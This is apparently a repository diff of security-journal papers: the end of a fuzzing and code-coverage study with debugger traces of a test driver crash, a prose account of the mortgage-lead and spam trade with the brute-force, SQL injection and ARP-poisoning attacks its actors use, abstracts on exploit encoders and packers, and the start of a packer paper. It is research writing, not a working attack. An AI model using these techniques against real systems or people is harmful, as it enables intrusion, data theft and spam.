pluto.sys.0.BadFuzz-processed. The psviewrecordingfuncs is executed on the
|
||||
pluto.sys.0.BadFuzz-processed file to produce the file called BadFuzz.gml,
|
||||
which is the chosen name for the initial testing technique. More information on
|
||||
Pedram's Python scripts, reference the Process Stalking Manual. Opening the
|
||||
resulting .gml file will enable us to view the following graph.
|
||||
|
||||
Executed blocks are available in pink, unexecuted blocks are shown as grey,
|
||||
paths of execution are green lines, and unexecuted paths are red lines. At this
|
||||
point it is important to note that the code block starting at address 00011169
|
||||
does not get executed. This is detrimental to our testing process because it
|
||||
appears that fuzzer supplied data is passed to it and it does not appear to get
|
||||
executed. Based on this evidence, we can conclude that a readjustment of our
|
||||
testing methodologies needs to be put in place so that we can hit that
|
||||
unexecuted block.
|
||||
|
||||
Analysis indicates that the device driver does not execute block 00011169
|
||||
because a comparison is made in the block at address 00011147 which reveals
|
||||
that [eax] does not match a specified value. Since eax is pointing to the
|
||||
fuzzer supplied data, we should be able to adjust the fuzzer to meet the
|
||||
requirement of the 00011161 cmp dword ptr [eax], 0DEADBEEFh instruction, which
|
||||
will allow us to get into block 00011169. BetterFuzz.exe was improved to do
|
||||
complete the previous description.
|
||||
|
||||
|
||||
5.5.1) Part II
|
||||
|
||||
Determining that the previous testing methodology is not effective, a
|
||||
re-engineering of the test case has been implemented and re-testing the driver
|
||||
to hit the missed block can now be accomplished. Following the steps provided
|
||||
in Part I, the driver is loaded into the Virtual PC, kd is attached to the
|
||||
driver process, and Debug Stalk has been loaded into kd and has been invoked to
|
||||
run by using the 'g' command. The entire process is the same except that when
|
||||
the new fuzz test is invoked, different output is printed to kd:
|
||||
|
||||
kd> g
|
||||
[*] - Recorder Opened......: pluto.sys.0
|
||||
[*] - Recorder Opened......: pluto.sys-regs.0
|
||||
Modload: Processing breakpoints for module pluto.sys at f7a27000
|
||||
Modload: Done. 46 of 46 breakpoints were set.
|
||||
004047a0 T:00000001 [bp] f7a2b000 a100a0a2f7 mov eax,dword ptr [pluto+0x3000 (f7a2a000)]
|
||||
004052bc T:00000001 [bp] f7a2b00e 3bc1 cmp eax,ecx
|
||||
00405339 T:00000001 [bp] f7a2b012 a12890a2f7 mov eax,dword ptr [pluto+0x2028 (f7a29028)]
|
||||
004053e5 T:00000001 [bp] f7a2b02b e9aed1ffff jmp pluto+0x11de (f7a281de)
|
||||
00405462 T:00000001 [bp] f7a281de 55 push ebp
|
||||
004054ee T:00000001 [bp] f7a28219 8b45fc mov eax,dword ptr [ebp-4]
|
||||
0040558b T:00000001 [bp] f7a28253 6844646b20 push 206B6444h
|
||||
00405617 T:00000001 [bp] f7a282a2 b980000000 mov ecx,80h
|
||||
00405694 T:00000001 [bp] f7a282ab 5f pop edi
|
||||
00406ccc T:00000001 [bp] f7a2806a 8b4c2408 mov ecx,dword ptr [esp+8]
|
||||
00406e04 T:00000001 [bp] f7a280f6 833d04a0a2f700 cmp dword ptr [pluto+0x3004 (f7a2a004)],0
|
||||
00406eb0 T:00000001 [bp] f7a2810c 8b7760 mov esi,dword ptr [edi+60h]
|
||||
00406f4c T:00000001 [bp] f7a28114 8b4704 mov eax,dword ptr [edi+4]
|
||||
00406ff8 T:00000001 [bp] f7a28122 6a10 push 10h
|
||||
00407075 T:00000001 [bp] f7a28133 85c0 test eax,eax
|
||||
00407102 T:00000001 [bp] f7a28147 ff7604 push dword ptr [esi+4]
|
||||
004071ae T:00000001 [bp] f7a28169 6a04 push 4
|
||||
|
||||
current context:
|
||||
|
||||
eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052
|
||||
eip=804e3b25 esp=f3cbe720 ebp=f3cbe768 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246
|
||||
nt!RtlpBreakWithStatusInstruction:
|
||||
804e3b25 cc int 3
|
||||
|
||||
commands:
|
||||
|
||||
[m] module list [0-9] enter recorder modes
|
||||
[x] stop recording [v] toggle verbosity
|
||||
[q] quit/close
|
||||
|
||||
kd> k
|
||||
ChildEBP RetAddr
|
||||
f3c1971c 805328e7 nt!RtlpBreakWithStatusInstruction
|
||||
f3c19768 805333be nt!KiBugCheckDebugBreak+0x19
|
||||
f3c19b48 805339ae nt!KeBugCheck2+0x574
|
||||
f3c19b68 805246fb nt!KeBugCheckEx+0x1b
|
||||
f3c19bb4 804e1ff1 nt!MmAccessFault+0x6f5
|
||||
f3c19bb4 804da1ee nt!KiTrap0E+0xcc
|
||||
*** ERROR: Module load completed but symbols could not be loaded for pluto.sys
|
||||
f3c19c48 f79f0173 nt!memmove+0x72
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
f3c19c84 8057a510 pluto+0x1173
|
||||
f3c19d38 804df06b nt!NtWriteFile+0x602
|
||||
f3c19d38 7c90eb94 nt!KiFastCallEntry+0xf8
|
||||
0006fec0 7c90e9ff ntdll!KiFastSystemCallRet
|
||||
0006fec4 7c81100e ntdll!ZwWriteFile+0xc
|
||||
0006ff24 01001276 kernel32!WriteFile+0xf7
|
||||
0006ff44 010013a7 betterfuzz_c!main+0xa4
|
||||
0006ffc0 7c816d4f betterfuzz_c!mainCRTStartup+0x12f
|
||||
0006fff0 00000000 kernel32!BaseProcessStart+0x23
|
||||
|
||||
current context:
|
||||
|
||||
eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052
|
||||
eip=804e3b25 esp=f3c19720 ebp=f3c19768 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246
|
||||
nt!RtlpBreakWithStatusInstruction:
|
||||
804e3b25 cc int 3
|
||||
|
||||
commands:
|
||||
|
||||
[m] module list [0-9] enter recorder modes
|
||||
[x] stop recording [v] toggle verbosity
|
||||
[q] quit/close
|
||||
|
||||
kd> q
|
||||
[*] - Exiting Stalker
|
||||
q
|
||||
|
||||
C:\Uninformed>
|
||||
|
||||
Generating the .gml file allows the tester to view the new execution path. In
|
||||
this case the block at address 00011169 is executed. All subsequent blocks
|
||||
underneath it are not executed because the driver BugChecks inside of this
|
||||
newly hit block indicating a bug of some sort. Command 'k' in kd produces the
|
||||
stack unwind information and we can see that a BugCheck was initiated for an
|
||||
Access Violation that occurs inside of pluto.sys.
|
||||
|
||||
|
||||
5.6) Part III
|
||||
|
||||
Analysis of the graph BadFuzz.gml generated in Part I indicated that the
|
||||
testing methods used were not effective enough to exhibit optimal code coverage
|
||||
of the device driver in question. Part II implemented an improved test case
|
||||
based on the coverage analysis used in Part I. Graph BetterFuzz.gml allowed
|
||||
test executers to view the improved testing methods to ensure that the missed
|
||||
block was reached. This process revealed a fault in block 00011169 which would
|
||||
have otherwise remained undetected without code coverage analysis.
|
||||
|
||||
|
||||
6) Conclusion and Future Work
|
||||
|
||||
This paper illustrated an improved testing technique by taking advantage of
|
||||
code coverage methods using basic graph theory. The author would like to
|
||||
reiterate that the driver and fuzz tool used in this paper were simple examples
|
||||
to illustrate the effectiveness of code coverage practices.
|
||||
|
||||
Finally, more research and experimentation are needed to fully implement these
|
||||
theorems. The question remains on how to integrate a full code coverage
|
||||
analysis tool and a fuzzing tool. Much work has been done on code coverage
|
||||
techniques and their implementations. For example, the paper entitled
|
||||
Cryptographic Verification of Test Coverage Claims, Devanbu, et al presents
|
||||
protocols for coverage testing methods such as verifying coverage with and
|
||||
without source code, with just the binary which can utilize both block and
|
||||
branch testing (e0178[1].PDF). A tool to automate the espousal of code coverage
|
||||
and fuzz technologies needs to be implemented so that the two technologies may
|
||||
work together without manual investigation. Further research may include more
|
||||
sophisticated coverage techniques using graph theory such as super blocks,
|
||||
denominators, and applying weights to frequently used loops, paths and edges.
|
||||
CFGs may also benefit from Bayesian networks which are a directed cyclic graph
|
||||
of nodes represented as variables including distribution probability for these
|
||||
variables given the values of its parents. In other words, the Bayesian theory
|
||||
may be helpful for deterministic prediction of code execution which can in turn
|
||||
lead to more intelligent fuzzing. In closing, the author extends the hope that
|
||||
methods and methodologies shared herein can offer other ideas to researchers.
|
||||
|
||||
|
||||
A. References
|
||||
|
||||
Devanbu, T (2000). Cryptographic Verification of Test
|
||||
Coverage Claims. IEEE. 2, 178-192.
|
418
uninformed/5.4.txt
Normal file
418
uninformed/5.4.txt
Normal file
|
@ -0,0 +1,418 @@
|
|||
Wars Within
|
||||
9/2006
|
||||
Orlando Padilla
|
||||
xbud@g0thead.com
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: In this paper I will uncover the information exchange of what
|
||||
may be classified as one of the highest money making schemes coordinated
|
||||
by 'organized crime'. I will elaborate on information gathered from a
|
||||
third party individual directly involved in all aspects of the scheme at
|
||||
play. I will provide a detailed explanation of this market's origin,
|
||||
followed by a brief description of some of the actions strategically
|
||||
performed by these individuals in order to ensure their success.
|
||||
Finally, I will elaborate on real world examples of how a single person
|
||||
can be labeled a spammer, malware author, cracker, and an entrepreneur
|
||||
gone thief. For the purposes of avoiding any legal matters, and
|
||||
unwanted media, I will refrain from mentioning the names of any
|
||||
individuals and corporations who are involved in the schemes described
|
||||
in this paper.
|
||||
|
||||
Disclaimer: This document is written with an educational interest and I
|
||||
cannot be held liable for any outcome of the information released.
|
||||
|
||||
Thanks: vax, Shannon and Katelynn
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
It is inherently obvious to anyone who owns a computer that the Internet
|
||||
has changed the world around us in a significant number of ways. From
|
||||
an uncountable number of careers to a world-wide open market, it
|
||||
drastically affected everything around us. Don't worry though, I will
|
||||
not bore you with another ``The future will look like this ... ''
|
||||
article. For that, I will refer to you a great book by Michio Kaku
|
||||
called Visions that is remarkably accurate considering it was written in
|
||||
the mid 90's. But anyway, why am I restating the obvious? To allow
|
||||
myself to focus on one not so obvious division of an existing market
|
||||
developed by a corporation that had previously filed for bankruptcy. I
|
||||
will elaborate on how it "innovated" one particular market and how that
|
||||
change resulted in a ripple of disaster and greed. The market is real
|
||||
estate and my focus is on mortgage leads
|
||||
|
||||
The idea of finding, selling and stealing leads is anything but new, in
|
||||
fact Hollywood made a movie based entirely on the importance of sales
|
||||
leads titled 'Boiler Room' starring Giovanni Ribisi, Ben Affleck and Vin
|
||||
Diesel . The movie illustrates a perfect example of the significance of
|
||||
even one major lead.
|
||||
|
||||
I will begin by explaining what mortgage leads are, why they are worth
|
||||
writing a paper about and how certain individuals have made millions off
|
||||
of them. I will then discuss the roles of the connected individuals and
|
||||
how they continue to work when trust is the single point of failure. My
|
||||
decision to write this article is nothing more than informational, I
|
||||
have no intentions of ruining the lives of the people who make a living
|
||||
from what I am about to discuss. In fact, it is to my knowledge not
|
||||
much of a secret at all but I found it fascinating and wish to share my
|
||||
experiences with anyone willing to listen.
|
||||
|
||||
|
||||
3) Guidance
|
||||
|
||||
As I was growing up, my parents discouraged me from working while
|
||||
attending school. They made a genuine attempt to provide for me the
|
||||
support that I needed so that I could focus exclusively on my academics.
|
||||
Their reasoning for this was simple - Once you start making money,
|
||||
you'll forget what is important in life and will simply want to follow
|
||||
this path. As you read through this paper, ask yourself how true this
|
||||
actually is.
|
||||
|
||||
|
||||
Financial gain drives every market around the world, and quite honestly
|
||||
there are very few things the world as a whole has not yet done for
|
||||
money. To quantify what my parents' believe, I will describe how the
|
||||
lives of the people involved vary from the lives they once lived, and
|
||||
from the lives of a person working a nine-to-five job.
|
||||
|
||||
|
||||
4) The Entity
|
||||
|
||||
Mortgage leads, referred to as leads from this point on, are nothing
|
||||
more than a selective set of criteria consisting of the following:
|
||||
|
||||
|
||||
First Name
|
||||
Last Name
|
||||
Phone
|
||||
City
|
||||
State
|
||||
Zip
|
||||
Email
|
||||
Loan Type
|
||||
Loan Amount
|
||||
Affiliate ID
|
||||
Domain Ref.
|
||||
Date
|
||||
|
||||
|
||||
Each lead must contain at least the above criteria with the exception of
|
||||
perhaps Affiliate ID and Domain Reference to be worth anything to a
|
||||
buyer. Furthermore, the more reliable a set of leads is, the more it is
|
||||
worth to a buyer. A buyer? You ask. Well, financing firms are
|
||||
indirectly involved in this scheme; finance firms take the information
|
||||
you sold to them, and follow up with the people allegedly interested in
|
||||
buying, refinancing or applying for a home loan.
|
||||
|
||||
|
||||
4.1) Background
|
||||
|
||||
To fully understand who is selling the collected information and to
|
||||
elaborate on who is buying the information listed above, I'll introduce
|
||||
hypothetical Corporation A to play the role of the real company. Corp.
|
||||
A is a mortgage firm on the fall, not only are they on the verge of
|
||||
closing shop but they have already filed for Chapter 11 bankruptcy and
|
||||
are out of viable options for recovery. As a last resort they decide to
|
||||
offer money in exchange for possible loan application candidate leads.
|
||||
This quickly gained momentum as the Internet was a prime place for
|
||||
accumulating such information. The plan eventually imploded, but before
|
||||
diving into what the outcome was, I'll elaborate on how this truly
|
||||
became its own market.
|
||||
|
||||
|
||||
4.2) Numbers
|
||||
|
||||
Initially each collector averaged about 200 leads per sale which drove
|
||||
just enough profits to keep the company afloat. The term collector in
|
||||
this paper in its loosest sense is a name given to an individual who
|
||||
collects mortgage leads for the purpose of attaining a profit. A lead
|
||||
was first bought at a flat rate of 10 US dollars which at an average of
|
||||
200 per sale the profit for the collector was a comfortable 2,000 US
|
||||
dollars. On the flip side of things, Corp. A was successfully
|
||||
conducting business averaging about 10 sales for every 100 leads they
|
||||
bought. With these numbers consistently coming through Corp. A made a
|
||||
profit of about 10,000 US dollars for every successful sale. A little
|
||||
math illustrates the return on investment ratio:
|
||||
|
||||
|
||||
Investment: 200 x 10 = 2000
|
||||
Average Profit: 10,000 x 20 = 200,000
|
||||
Return on Investment: 200,000 - 2,000 = 198,000
|
||||
|
||||
|
||||
Based on the collection of an insignificant amount of information,
|
||||
collectors aggressively innovated their collections methods. I will
|
||||
elaborate on what I mean shortly. For now, I will focus on what happened
|
||||
immediately after.
|
||||
|
||||
New collection methods drove the lead delivery out of control and soon
|
||||
Corp. A was inundated with so many leads that they had to start turning
|
||||
them down until they figured out how to process the volume. In order to
|
||||
handle the number of leads they were now attaining, they decided to
|
||||
partner with smaller companies and sell them the overflow. Corp. A was
|
||||
now growing exponentially fast, and in a period of roughly five to six
|
||||
years, this simple idea drove Corp. A from bankruptcy to a multi-billion
|
||||
dollar corporation. It is actually rumored that at one point in time
|
||||
this company consumed 100 of the mortgage leads ever processed in the
|
||||
United States.
|
||||
|
||||
People and greed do not mix very well, and as I mentioned, earlier
|
||||
collectors and partners wanted more money, so soon other companies began
|
||||
buying leads from collectors too. I argue that at the time the mortgage
|
||||
industry was large enough for everyone to profit nicely from it, however
|
||||
greedy collectors began selling bogus or non-exclusive leads. This
|
||||
forced mortgage firms to develop a loose classification model for
|
||||
grading the quality of a lead as an addition to the classification of
|
||||
the leads themselves.
|
||||
|
||||
- Exclusive
|
||||
|
||||
An exclusive lead is one that is sold only to one mortgage firm and never again
|
||||
redistributed. The value of these leads was often higher than non-exclusive, or
|
||||
as they decided to term them, semi-exclusive leads.
|
||||
|
||||
- Semi-Exclusive
|
||||
|
||||
Yes, semi-exclusive. I honestly cannot define this, as this is an
|
||||
oxymoron itself, but someone somewhere. An individual who
|
||||
wishes to stay anonymous informed me of terms commonly used.
|
||||
decided to call non-exclusive leads semi-exclusive to allow them to
|
||||
be resold. It's a nice euphemism, though.
|
||||
|
||||
|
||||
Grade | Description
|
||||
--------+-------------
|
||||
Green | Confirmed Valid Lead
|
||||
Yellow | Characteristics of a bad lead but enough good to buy
|
||||
Red | Confirmed Invalid Lead
|
||||
|
||||
The reliability of a bulk set is assessed by the person buying them at
|
||||
the time of sale. The person interested in buying the leads takes a
|
||||
random set from the bulk he is receiving and personally verifies their
|
||||
validity. A rating is then given depending on the number of missed
|
||||
leads he finds. The grading is different with every person you deal
|
||||
with, but in short a lead is only Green if validated. A validated lead
|
||||
is one that is confirmed through the person who's information was sold
|
||||
to begin with (The loan application candidate) goes through.. A yellow
|
||||
lead is a lead with all information accurate but the candidate was
|
||||
either not home or for some reason was not available. Last, a red lead
|
||||
is a confirmed invalid or bogus lead. A number of things can give away
|
||||
a bad lead, for example Zip code and State not matching, or the name
|
||||
given is John Doe and the address contains Elm Street are probably
|
||||
indications of a bad lead.
|
||||
|
||||
|
||||
5) The War
|
||||
|
||||
Now that I have indulged you with the whereabouts and importance of a
|
||||
lead, I will discuss how they are obtained. I mentioned above how far an
|
||||
individual would go as a result of greed? Below I describe their
|
||||
actions, which outlines their (at times) unethical behavior and
|
||||
persistence to attain more of the goods.
|
||||
|
||||
|
||||
5.1) Self Indulgence
|
||||
|
||||
When the collector decides to go a straight route (in terms of their
|
||||
industry), they can invest some time and money into setting up an
|
||||
infrastructure to lure potential clients to their web site. They first
|
||||
need to build a site that resembles a loan agency that allows visitors
|
||||
to send their applications to them. Once the collector has a website
|
||||
saving information to a database, he now hires mailers or spammers to
|
||||
advertise his website. The average return on spam has been extremely
|
||||
dynamic, and with more advanced filtering mechanisms in place, all a
|
||||
spammer can hope for is more effective evasion methods. The leads
|
||||
collected through this method are, on average, valued between eight and
|
||||
twelve US dollars per lead only because they are exclusive opt-ins. An
|
||||
opt-in is a user who wishes to recieve information regarding the service
|
||||
or product you provide. (i.e. no one else should have this information
|
||||
as they obtained it directly from the client). There have been
|
||||
instances when leads are scarse however, and opt-ins sold for over
|
||||
twenty US dollars a lead. Semi-exclusive (or non-exclusive) leads on
|
||||
the other hand are usually half or less than the price of an exclusive
|
||||
lead.
|
||||
|
||||
The second method of collection is not as trivial as the first one
|
||||
sounds, although the first is a bit more involved than I actually
|
||||
described. I will elaborate further on what it takes to successfully
|
||||
build the infrastructure described above shortly.
|
||||
|
||||
|
||||
5.2) Thievery
|
||||
|
||||
Thievery obviously refers to stealing, and to steal, the collector has
|
||||
to choose from an abundance of targets. Essentially, anyone
|
||||
constructing an environment to collect leads themselves is a possible
|
||||
target. Things fall into place fairly easily for a collector wanting to
|
||||
find more targets -- recall how collectors use mailers as resources to
|
||||
advertise their websites? This is a pretty viable method for collection
|
||||
however, alternative methods do exist and collectors use any and all
|
||||
possible enumeration methods they can think of. First, lets dive into
|
||||
the details of what collectors looking to construct websites need to do
|
||||
before hiring mailers since this is directly related to the enumeration
|
||||
of targets.
|
||||
|
||||
|
||||
5.3) Setting up an Infrastructure
|
||||
|
||||
So far all this seems pretty straight forward; they setup a webserver to
|
||||
collect information about the people interested in mortgage loans and
|
||||
the mailers responsible for advertising get a sales commission for leads
|
||||
collected by their spam. Unsolicited e-mail, often of a commercial
|
||||
nature, sent indiscriminately to multiple mailing lists, individuals, or
|
||||
newsgroups; junk e-mail. run. To complete the cycle, the people
|
||||
interested in loans receive an email which sparks their interest and
|
||||
they navigate to the link found in the email. Collectors are usually
|
||||
ambitious and make an eager attempt at keeping their domains, websites,
|
||||
and mailers going round the clock. In the United States it is illegal
|
||||
to spam a person without their consent, and to use spam as advertisement
|
||||
to a website (the loan forms) hosted on a webserver in the US is not too
|
||||
common but they do exist. The easiest thing for a collector to do is to
|
||||
find a hosting provider in a communist country with no regard for the
|
||||
content placed on their servers. The technical term for this type of
|
||||
service is bullet-proof-hosting. A bullet-proof-host is a node on a
|
||||
provider's network with extremly loose Terms of Service, often allowing
|
||||
them to spam or host any content they wish. Usually the provider resides
|
||||
in a third world or communist country.. The average price for such a
|
||||
service is about 2,500 US dollars a month. An alternative to dishing out
|
||||
large amounts of cash for hosting services is using a bot network. A
|
||||
distributed collection of agents (bots) connected and controlled by a
|
||||
central authority.. Usually though, bot networks are pretty dynamic and
|
||||
don't fit the necessary requirements to host this type of content. If a
|
||||
collector pays a mailer to spam his site for two or three days and the
|
||||
host goes down the first night (because of an unreliable bot host) a lot
|
||||
is lost and so generally experienced folks tend to pay for reliable
|
||||
hosting.
|
||||
|
||||
Often, the businesses providing the bullet-proof-hosting servers are
|
||||
relatively well known, and if they are known so is their allotted IP
|
||||
space. This, in turn, makes finding servers hosting mortgage
|
||||
applications a piece of cake. All one has to do is scan a known IP
|
||||
segment for specific criteria and keep track of those that fit the
|
||||
profile. Once a worthy target list has been collected, the attacks
|
||||
follow. An interesting fact about the individuals involvement in this
|
||||
industry is that nothing either one is doing is really all that legal.
|
||||
This, in fact, allows an attacker to launch whatever type of attack he
|
||||
wants on the victim machine with little to no worry about legal
|
||||
repercussions. Often a collection machine will have several required
|
||||
services open to the Internet, for example: http, ssh, ftp, mysql or
|
||||
mssql and sometimes an administrative web interface. The scope of an
|
||||
attack is unlimited and the number of man hours invested directly
|
||||
reflects on the amount of traffic the victim website attracts. It is
|
||||
even pretty common for certain prowlers to lease a server from the same
|
||||
segment the victim machine is on simply to increase their odds of
|
||||
breaching the host. The following shortly describes common attack
|
||||
practices launched against victim websites.
|
||||
|
||||
- Brute-force Enumeration
|
||||
|
||||
An attacker will attempt to guess login and password pairs on any if
|
||||
not all of these services. Usually this kind of attack is not too
|
||||
stealthy, but remember there is little worry - I mean the victim
|
||||
cannot simply pick up the phone and call his lawyer can he?
|
||||
|
||||
- SQL Injection
|
||||
|
||||
If any of the web interfaces are accessible through the site, sql
|
||||
injection attacks are another vector for entry. Although the success
|
||||
ratio of sql injection is now relatively low, there are still some
|
||||
low hanging fruit to find and be assured someone greedy and
|
||||
ambitious enough will find it.
|
||||
|
||||
- Classic Attacks
|
||||
|
||||
With the massively large number of exploits developed and released to
|
||||
the public daily, searching and launching attacks is a frequent action.
|
||||
This sometimes opens up a new market for exploit writers looking to
|
||||
make some quick cash. Collectors can advertise the need for an exploit
|
||||
and place a price on a particular application. There are even online
|
||||
auctions that have been built specifically for this purpose.
|
||||
|
||||
- Passive / Passive Aggressive
|
||||
|
||||
When an attacker decides to lease a machine on the same segment, it
|
||||
is usually because they failed to remotely compromise the victim's
|
||||
machine. As a last resort they can do several things to retrieve
|
||||
the information they are looking for. The attacker can launch an
|
||||
ARP Poisoning attack and sniff all the incoming traffic to the
|
||||
victim machines, an attacker can simply redirect all the client
|
||||
requests to himself and collect the leads himself, or even hope for
|
||||
the victim himself to logon and perform a man-in-the middle attack to
|
||||
passively collect credentials.
|
||||
|
||||
|
||||
6) More on The Money
|
||||
|
||||
In this section, I will associate the roles described above with the
|
||||
amount of money they can generate. As described earlier, the mailer
|
||||
serves as the core distributor of an advertising campaign. As a company
|
||||
would pay a marketing company for it to advertise its products, a
|
||||
collector pays a mailer to generate leads (e.g advertise and generate
|
||||
revenue). He can also simply take matters into his or her own hands and
|
||||
do the dirty work himself. If a mailer is hired however, to properly
|
||||
track what a mailer collects there is a nifty procedure in place. Each
|
||||
mailer is given a unique ID number and the link spammed in each email
|
||||
contains the ID number. When a client submits information regarding his
|
||||
loan inquiry, the mailer's ID number is included and the collector now
|
||||
has record of how many leads a mailer is generating. This method of
|
||||
tracking referrals is well adopted in most spam/advertising related
|
||||
industries online. The majority of spyware and adware vendors leverage
|
||||
this method of tracking to pay their affiliates.
|
||||
|
||||
A single spam run can be as large as two million emails. The time
|
||||
needed to complete a run that big depends on a few key factors - the
|
||||
method used for distribution and the spam software being used. If a
|
||||
decent sized list of proxies is used you can send an average of about
|
||||
forty thousand emails per half hour using Dark Mailer . With a little
|
||||
math we can compute that transmitting two million emails would take
|
||||
about twenty-five hours. More over, if I were to shoot low and say that
|
||||
.01 percent of two million emails from a single spam run actually
|
||||
worked, the return for the collector on exclusive leads is about 200
|
||||
leads per mailer at 10 dollars a lead results to about 2,000 USD. The
|
||||
mailers recieve on average about 8 per referal and can usually track
|
||||
their statistics through a web-based front end tracking their return on
|
||||
time investment in real-time.
|
||||
|
||||
|
||||
7) The Disaster
|
||||
|
||||
So far, I've covered in fairly good detail the structure of what was
|
||||
once a falling corporation taking a 180 degree turn and rising straight
|
||||
back up to the top. It is too well known though, that what goes up must
|
||||
come down and twice as fast as it went up.
|
||||
|
||||
The core of the problems started out when mailers began to falsify the
|
||||
content of the spam for their collectors. Mailers noticed that the
|
||||
lower the rate they advertised the more traffic they would drive to the
|
||||
collector's website. More traffic indicated a higher collection of
|
||||
leads which resulted in more money. Whether the mailers were aware of
|
||||
the laws before they did what they did is unknown to me but their lies
|
||||
resulted in law suites unfolding from all sides. Unhappy individuals
|
||||
who had been promised a 1.9 - 2.5 interest rate on a loan began filing
|
||||
law suites against the collectors. This resulted in a fairly large
|
||||
chain of angry partners. The hierarchy below indicates the ripple of
|
||||
disaster that came about.
|
||||
|
||||
|
||||
8) Conclusion
|
||||
|
||||
It is fair to say that ambition can get the best out of people Indeed,
|
||||
I'm sure these individuals are trying their best to make a profit out of
|
||||
this endeavor. Unfortunately, it is not the most appropriate way to
|
||||
make a living; it does however show that their perception is a bit
|
||||
different. Most of them feel that by staying away from selling drugs
|
||||
and pornography online, they are not hurting anyone and simply taking
|
||||
advantage of a good way to make some money. In retrospect, I agree, but
|
||||
I refuse to condone spam for any reason, it consumes countless corporate
|
||||
man hours and is a general nuisance to anyone who receives email.
|
||||
|
||||
|
||||
A. References
|
||||
|
||||
Spammer-X, ``Inside the spam cartel." http://www.oreilly.com/catalog/1932266860/.
|
||||
Boiler Room, http://www.imdb.com/title/tt0181984/.
|
||||
|
||||
|
||||
|
||||
|
BIN
uninformed/5.5.pdf
Normal file
BIN
uninformed/5.5.pdf
Normal file
Binary file not shown.
29
uninformed/5.txt
Normal file
29
uninformed/5.txt
Normal file
|
@ -0,0 +1,29 @@
|
|||
Exploitation Technology
|
||||
Implementing a Custom X86 Encoder
|
||||
skape
|
||||
This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder. In particular, this vulnerability does not permit the use of uppercase characters. To help make things more interesting, the encoder described in this paper will also avoid all characters above 0x7f. This will make the encoder both UTF-8 safe and tolower safe.
|
||||
txt | html | pdf
|
||||
|
||||
Preventing the Exploitation of SEH Overwrites
|
||||
skape
|
||||
This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation. While Microsoft has attempted to address this attack vector through changes to the exception dispatcher and through enhanced compiler support, such as with /SAFESEH and /GS, the majority of benefits they offer are limited to image files that have been compiled to make use of the compiler enhancements. This limitation means that without all image files being compiled with these enhancements, it may still be possible to leverage an SEH overwrite to gain code execution. In particular, many third-party applications are still vulnerable to SEH overwrites even on the latest versions of Windows because they have not been recompiled to incorporate these enhancements. To that point, the technique described in this paper does not rely on any compile time support and instead can be applied at runtime to existing applications without any noticeable performance degradation. This technique is also backward compatible with all versions of Windows NT+, thus making it a viable and proactive solution for legacy installations.
|
||||
txt | html | pdf
|
||||
|
||||
Fuzzing
|
||||
Effective Bug Discovery
|
||||
vf
|
||||
Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations. Code coverage analysis implemented in conjunction with fuzz testing reveals faults within a binary file that would have otherwise remained undiscovered by either method alone. This paper suggests a research method for more effective runtime binary analysis using the aforementioned strategy. This study presents empirical evidence that despite the fact that bug detection will become increasingly difficult in the future, analysis techniques have an opportunity to evolve intelligently.
|
||||
code.tgz | txt | html | pdf
|
||||
|
||||
General Research
|
||||
Wars Within
|
||||
Orlando Padilla
|
||||
In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play. I will provide a detailed explanation of this market's origin, followed by a brief description of some of the actions strategically performed by these individuals in order to ensure their success. Finally, I will elaborate on real world examples of how a single person can be labeled a spammer, malware author, cracker, and an entrepreneur gone thief. For the purposes of avoiding any legal matters, and unwanted media, I will refrain from mentioning the names of any individuals and corporations who are involved in the schemes described in this paper.
|
||||
txt | html | pdf
|
||||
|
||||
Wireless Technology
|
||||
Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field
|
||||
Johnny Cache
|
||||
The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using. The technique outlined is entirely passive, and given the amount of features that are being considered for inclusion into the 802.11 standard, seems quite likely that it will increase in precision as the standard marches forward. The implications of this are far ranging. On one hand, the techniques can be used to implement innovative new features in Wireless Intrusion Detection Systems (WIDS). On the other, they can be used to target link layer device driver attacks with much higher precision.
|
||||
code.ref | html | pdf
|
||||
|
2606
uninformed/6.1.txt
Normal file
2606
uninformed/6.1.txt
Normal file
File diff suppressed because it is too large
Load diff
895
uninformed/6.2.txt
Normal file
895
uninformed/6.2.txt
Normal file
|
@ -0,0 +1,895 @@
|
|||
Locreate: An Anagram for Relocate
|
||||
skape
|
||||
12/2006
|
||||
mmiller@hick.org
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper presents a proof of concept executable packer
|
||||
that does not use any custom code to unpack binaries at execution time. This
|
||||
is different from typical packers which generally rely on packed executables
|
||||
containing code that is used to perform the inverse of the packing operation
|
||||
at runtime. Instead of depending on custom code, the technique described in
|
||||
this paper uses documented behavior of the dynamic loader as a mechanism for
|
||||
performing the unpacking operation. This difference can make binaries packed
|
||||
using this technique more difficult to signature and analyze, but only when
|
||||
presented to an untrained eye. The description of this technique is meant to
|
||||
be an example of a fun thought exercise and not as some sort of revolutionary
|
||||
packer. In fact, it's been used in the virus world many years prior to this
|
||||
paper.
|
||||
|
||||
Thanks: The author would like to thank Skywing, spoonm, deft,
|
||||
intropy, Orlando Padilla, nemo, Richard Johnson, Rolf Rolles, Derek Soeder,
|
||||
and Andre Protas for their discussions and feedback.
|
||||
|
||||
Challenge: Prior to reading this paper, the author recommends that
|
||||
the reader attempt to determine the behavior of the packer that was used on
|
||||
the binary included in the attached code sample. The binary itself is
|
||||
innocuous and just performs a few simple printf operations.
|
||||
|
||||
Previous Research: This technique has been used in the virus world far in
|
